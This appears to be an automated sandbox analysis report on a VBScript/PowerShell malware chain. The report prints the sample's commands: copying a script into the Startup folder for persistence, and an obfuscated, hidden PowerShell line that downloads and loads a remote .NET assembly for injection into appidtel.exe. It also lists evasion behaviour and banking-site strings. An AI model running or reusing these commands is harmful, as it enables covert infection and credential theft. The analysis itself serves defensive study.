Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("cmd.exe /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Co", "0", "true");IHost.FullName();IWshShell3.CurrentDirectory();IHost.ScriptName();IWshShell3.SpecialFolders("Startup");IFileSystem3.FileExists("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pinheirame.vbs");IFileSystem3.CopyFile("C:\Windows\system32\Payment.vbs", "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pinheirame.vbs");IWshShell3.Run("cmd.exe /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Co", "0", "true");IWshShell3.Run("powershell -command $Codigo = 'SWV4ICgoKCdoJysnUmZ1JysncmwgPSBoM2todHRwczo", "0", "false")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ((('h'+'Rfu'+'rl = h3khttps:'+'//'+'ra'+'w.'+'githu'+'bu'+'ser'+'conten'+'t.com'+'/No'+'DetectO'+'n/NoDetectOn/refs/heads/main/De'+'tahNoth-'+'V.txth3k; hR'+'fb'+'ase64'+'Content ='+' (Ne'+'w-Object Syste'+'m.N'+'et.Web'+'Client).DownloadStr'+'ing'+'(hR'+'furl); hR'+'fbinar'+'yC'+'ontent = [S'+'y'+'stem.Conver'+'t]:'+':FromBa'+'s'+'e64Str'+'ing(h'+'Rfb'+'a'+'s'+'e64Co'+'ntent'+')'+'; h'+'Rfa'+'ss'+'embly = [Refle'+'ction'+'.Assembly'+']::Load(hRfbinaryContent); [d'+'nlib'+'.IO.Home]::VAI('+'Cut0/O'+'1FKS/d/ee.etsap'+'//:sptth'+'Cut, Cu'+'td'+'esativadoCut,'+' '+'Cu'+'tdesativadoCut, '+'Cutde'+'sativadoCut, Cutd'+'es'+'at'+'iva'+'do'+'Cut,'+' C'+'ut1C'+'ut, CutappidtelCut)') -cREplAcE'Cut',[cHAR]34 -REpLACe ([cHAR]104+[cHAR]82+[cHAR]102),[cHAR]36 -REpLACe([cHAR]104+[cHAR]51+[cHAR]107),[cHAR]39))"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD346300BD pushad ; iretd 5_2_00007FFD346300C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD346309AD push ss; retf 5_2_00007FFD346309C6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD34634FF3 push eax; retf 5_2_00007FFD34634FE9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFD346425CD push edx; retf 6_2_00007FFD34642636
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFD34641D9F push eax; iretd 6_2_00007FFD3464233D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD346200BD pushad ; iretd 8_2_00007FFD346200C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD34627006 push esp; iretd 8_2_00007FFD3462700C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_004190B6 push esi; ret 10_2_004190B9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0041AAB9 push esp; retf 10_2_0041AB04
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_004123D8 push edi; retf 10_2_004123EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_004123E3 push edi; retf 10_2_004123EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_004023B0 push esi; iretd 10_2_004023BA
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0040AC71 push edi; retf 10_2_0040AC73
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_004074B7 pushfd ; iretd 10_2_004074B9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_00412549 push ebx; iretd 10_2_0041254A
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_00403590 push eax; ret 10_2_00403592
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_00411E28 push ebx; retf 10_2_00411E2D
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_00406685 push FFFFFFCBh; retf 10_2_0040668C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039009AD push ecx; mov dword ptr [esp], ecx 10_2_039009B6
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe Code function: 17_2_03ACA3FC push ecx; iretd 17_2_03ACA41A
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe Code function: 17_2_03ACEB69 push esp; retf 17_2_03ACEBB4
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe Code function: 17_2_03ACD166 push esi; ret 17_2_03ACD169
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe Code function: 17_2_03ACA0F1 push ebx; ret 17_2_03ACA0F6
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe Code function: 17_2_03ABA735 push FFFFFFCBh; retf 17_2_03ABA73C
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe Code function: 17_2_03AC65F9 push ebx; iretd 17_2_03AC65FA
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe Code function: 17_2_03ABED13 push edi; retf 17_2_03ABED23
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe Code function: 17_2_03AD356F push es; iretd 17_2_03AD357F
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe Code function: 17_2_03ABB567 pushfd ; iretd 17_2_03ABB569
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe Code function: 17_2_03AC6488 push edi; retf 17_2_03AC649F
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_036909AD push ecx; mov dword ptr [esp], ecx 19_2_036909B6
Source: C:\Windows\SysWOW64\convert.exe Code function: 19_2_035653DB pushfd ; ret 19_2_035653E3
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (5 identical entries)

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\convert.exe API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\convert.exe API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\convert.exe API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\convert.exe API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\convert.exe API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\convert.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\convert.exe API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10 (2 identical entries)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0397D1C0 rdtsc 10_2_0397D1C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (3 identical entries)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2870
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2356
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 901
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 499
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4538
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5231
Source: C:\Windows\SysWOW64\appidtel.exe API coverage: 0.8 %
Source: C:\Windows\SysWOW64\convert.exe API coverage: 1.9 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648 Thread sleep count: 2870 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6400 Thread sleep count: 2356 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3224 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5340 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4816 Thread sleep count: 4538 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4416 Thread sleep count: 5231 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3320 Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe TID: 5984 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2084 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (3 identical entries)
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: 62v53-Zo.19.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 62v53-Zo.19.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: 62v53-Zo.19.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
